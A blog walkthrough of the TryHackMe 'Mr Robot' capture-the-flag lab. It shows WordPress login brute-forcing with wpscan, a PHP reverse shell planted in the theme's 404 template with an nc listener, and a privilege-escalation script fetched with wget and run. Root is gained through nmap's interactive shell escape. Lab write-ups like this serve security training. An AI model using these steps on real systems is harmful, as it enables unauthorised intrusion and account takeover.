TryHackMe Mr Robot  CTF Walkthrough

This is my walkthrough for Mr-Robot

About TryHackMe

TryHackMe is an online platform that teaches Cybersecurity through hands-on virtual labs for beginners and experts.

About Mr Robot machine

Mr Robot is a virtual machine meant for beginners/intermediate infosec users. The objective of this challenge is to find 3 hidden keys located on the machine and get a root shell.



nmap -sCV -p-
Starting Nmap 7.70 ( ) at 2020-05-13 10:34 WAT
Nmap scan report for
Host is up (0.18s latency).
Not shown: 65532 filtered ports
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject:
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03


The open ports I focused on enumerating:

80 tcp
43 tcp

Web server port 80

On visiting the web page I found a website with an animation displayed in reference to the Mr Robot tv series. The animation ends at a screen which resembles a Linux terminal with a blinking cursor.


the first thing I do when I’m enumerating a webpage is to check robots.txt.
On checking /robots.txt file, I found an interesting wordlist and key file.

fsocity.dic and key-1-of-3.txt

inputting key-1-of-3.txt in the URL, I got my 1st key:

I downloaded the “fsocity.dic” wordlist file for later use.

The wordlist has about 858160 lines of words and some of the words have duplicates in the wordlist, I sorted the words:
sort fsocity.dic -u > sort fsocity.dic

After looking around I could not find any useful thing on the site I decided to use Gobuster to enumerate the web directory.

Web Directory Enumeration

gobuster -u -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -f -s 302,307,204,301,403

Gobuster gave me more directories, observing the directory list shows that the website runs on WordPress.


WordPress Enumeration

I started enumerating the wp pages but could not find anything interesting, so I jump to the login page "/wp-login".

Tried login in with default credentials admin: admin, admin: password, but the login attempts failed. After a long time of enumerating the username, I found Elliot to be a valid user (got that from the Mr Robot television series character Elliot Alderson ).

when I entered a wrong user I get invalid user and wrong pass.

When I entered elliot I got valid user but wrong pass.


Remember I downloaded a wordlist earlier, I used it and brute-force password of the username elliot.

Bruteforcing user (elliot)

Using wpscan and the wordlist I found earlier, I got the login creds :

wpscan --url -U elliot -P ~/Downloads/fsocity.dic



Reverse shell

I was able to log into wp-admin using the creds I found.

Using WordPress admin privilege which the user “elliot” has, we can get a reverse shell:

WordPress: Reverse Shell

steps for resetting WordPress reverse shell:

  1. goto appearance/editor/ 404 template and replace the php code with php reverse shellYou can get it here:
  2. Edited the following lines of php-reverse-shell.php with my local IP and reverse shell port 443:
    • $ip = ''; // CHANGE THIS
      $port = 1234; // CHANGE THIS

  3. updated the script (save)
  4. Started ncat listener on my system with same port here as I specified in the script 443
  5. nc -lvp 443
  6. visit the “/404” error page to trigger the reverse shell. “

I got limited shell as Daemon:

Spawn a TTY Shell

upgraded my shell to tty shell, this will enable me to interact more with the shell:

python3 -c “import pty; pty.spawn(‘/bin/sh’)”;

export TERM=xterm


Daemon shell does not have the privilege to access all the directories and files but can navigate some of the file systems. I moved to /home/ directory, found another directory for the user robot.  Robot, directory has 2 files.

One is the 2nd key, the other file is an md5 password hash for the user robot.

Daemon does not have read permission for key-2-of-3.txt, I can only read the key as Robot. However, I have read permission for the password.raw-md5 file, I cat the password file and got robot password md5 hash string. I cracked it on and obtained the password for the user robot.

User Robot

Using the password I obtain from the has I successfully logged in as robot and got the 2nd flag:
su robot and input password


Root Shell

The first thing I do when enumerating a machine for root shell is to check things I can do using sudo -l.
I tried sudo -l , with no luck, I can’t run any sudo cmd.

Privilege Escalation Script

Using python server I was able to transfer a Linux privilege escalation script to the machine.

steps I used for that:

  1. I cd into the dir where my script is, run python -m SimpleHTTPServer 8000 on my machine to start the python server.
  2. On Mr robot machine, I cd into /tmp directory and run wget 10. * . * . * :8000/ (http://IP:8000/
  3. chmod +x
  4. run ./

After enumerating with, from the result I found Nmap running as SUID in the machine, that’s interesting.

Checking gtfobins we can see how to leverage on nmap to get root.

I ran the commands and got a root shell

  • nmap --interactive
  • !sh


As root, I can move into any directory or run any command without restrictions.

I moved to /root/ directory and obtained the 3rd key

This is the end.

Thanks for reading this write-up. Stay tuned and follow me on twitter to receive updates on more write-ups and thoughts on information security concepts.

5 1 vote
Article Rating
Notify of
Inline Feedbacks
View all comments